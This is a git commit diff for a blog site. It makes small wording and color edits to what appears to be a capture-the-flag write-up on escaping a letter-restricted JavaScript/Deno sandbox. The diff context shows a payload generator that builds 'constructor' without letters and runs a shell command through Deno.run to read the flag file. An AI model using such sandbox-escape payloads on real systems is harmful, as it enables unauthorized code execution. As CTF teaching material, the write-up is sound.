nits
This commit is contained in:
parent
5b2a274c3f
commit
5fe47ab7ed
2
build.py
2
build.py
|
|
@ -283,7 +283,7 @@ def highlight(_):
|
|||
Token.String.Double: "", # class: 's2'
|
||||
Token.String.Escape: "#ae81ff", # class: 'se'
|
||||
Token.String.Heredoc: "", # class: 'sh'
|
||||
Token.String.Interpol: "", # class: 'si'
|
||||
Token.String.Interpol: "#f8f8f2", # class: 'si'
|
||||
Token.String.Other: "", # class: 'sx'
|
||||
Token.String.Regex: "", # class: 'sr'
|
||||
Token.String.Single: "", # class: 's1'
|
||||
|
|
|
|||
|
|
@ -109,7 +109,7 @@ let t = !0;
|
|||
let o = {};
|
||||
let u = 0[0];
|
||||
// 'falsetrue[object Object]undefined'
|
||||
let str = '' + !1 + !0 + {} + 0[0];
|
||||
let str = '' + f + t + o + u;
|
||||
let str_src = "''+!1+!0+{}+0[0]";
|
||||
// 'constructor' (246 characters)
|
||||
eval('constructor'
|
||||
|
|
@ -192,15 +192,15 @@ Now we need `S` and `g`, both of which are contained in `String`, something we c
|
|||
function encode(s, source, var_name='_') {
|
||||
let result = [];
|
||||
let t = '';
|
||||
for (let char of s) {
|
||||
for (let c of s) {
|
||||
// letters need to be encoded
|
||||
if (char.match(/[a-zA-Z]/)) {
|
||||
if (c.match(/[a-zA-Z]/)) {
|
||||
if (t) result.push(`"${t}"`), t = '';
|
||||
result.push(`${var_name}[${source.indexOf(char)}]`);
|
||||
result.push(`${var_name}[${source.indexOf(c)}]`);
|
||||
// otherwise, we can use a literal
|
||||
// if there are consecutive literals, we can merge them to save characters
|
||||
} else {
|
||||
t += char;
|
||||
t += c;
|
||||
}
|
||||
}
|
||||
if (t) result.push(`"${t}"`);
|
||||
|
|
@ -212,7 +212,7 @@ let src1 = eval(args);
|
|||
let src2 = src1 + String;
|
||||
let src3 = src2 + '6p';
|
||||
let src4 = src3 + escape(Function) + Number;
|
||||
// each statement in the body of the iife, which we can chain together with the , operator
|
||||
// each statement in the function body, which we can chain together with the , operator
|
||||
let body = [
|
||||
// $ and $$ are the 2nd and 3rd arguments, which are left undefined
|
||||
// we first build 'constructor' from _, and assign it to $$
|
||||
|
|
@ -274,7 +274,7 @@ let body = [
|
|||
`$$(${encode("$=''+btoa", src1)})()`,
|
||||
`$$(${encode("Deno.run({cmd:['sh','-c','cat /f*']})", src2, '$')})()`
|
||||
].join(',')
|
||||
// 278 bytes
|
||||
// 278 characters
|
||||
let payload = `((_,$$)=>(${body}))(${args})`
|
||||
console.log(payload)
|
||||
```
|
||||
|
|
@ -294,7 +294,7 @@ While the solution described above really isn't that complicated, it took me a s
|
|||
|
||||
There are a few different escape sequences in JavaScript. Aside from the usual escapes like `\n`, `\t`, and so forth, one noteworthy escape sequence is the octal escape. For example, `\104` is equivalent to the character with the octal code 104, or `D`.
|
||||
|
||||
Since this doesn't contain any letters, we could just replace all letters in our strings with their octal escape sequence, to bypass many of the steps listed above.
|
||||
Since this doesn't contain any letters, we could just replace all letters in our strings with their octal escape sequence, bypassing many of the steps listed above.
|
||||
|
||||
However, octal escape sequences are a deprecated language feature and are prohibited when running in strict mode. Other escape sequences like `\x44` or `\u0044` wouldn't work either since they contain letters.
|
||||
|
||||
|
|
@ -322,7 +322,7 @@ let payload = `(_=>(${body}))(${args})`
|
|||
|
||||
### prompt()
|
||||
|
||||
Before I found `btoa`, another thing I considered was finding some way to pass in some extra input to the program to avoid having to construct so many strings.
|
||||
Before I found `btoa`, another thing I considered was finding some way to pass in extra input to the program to avoid having to construct so many strings.
|
||||
|
||||
Looking over Deno's builtin functions, `prompt` does exactly what we want, taking in input from stdin and returning it as a string.
|
||||
|
||||
|
|
|
|||
|
|
@ -72,7 +72,7 @@ span.linenos.special { color: #000000; background-color: #ffffc0; padding-left:
|
|||
.hl .s2 { color: #e6db74 } /* Literal.String.Double */
|
||||
.hl .se { color: #ae81ff } /* Literal.String.Escape */
|
||||
.hl .sh { color: #e6db74 } /* Literal.String.Heredoc */
|
||||
.hl .si { color: #e6db74 } /* Literal.String.Interpol */
|
||||
.hl .si { color: #f8f8f2 } /* Literal.String.Interpol */
|
||||
.hl .sx { color: #e6db74 } /* Literal.String.Other */
|
||||
.hl .sr { color: #e6db74 } /* Literal.String.Regex */
|
||||
.hl .s1 { color: #e6db74 } /* Literal.String.Single */
|
||||
|
|
|
|||
Loading…
Reference in a new issue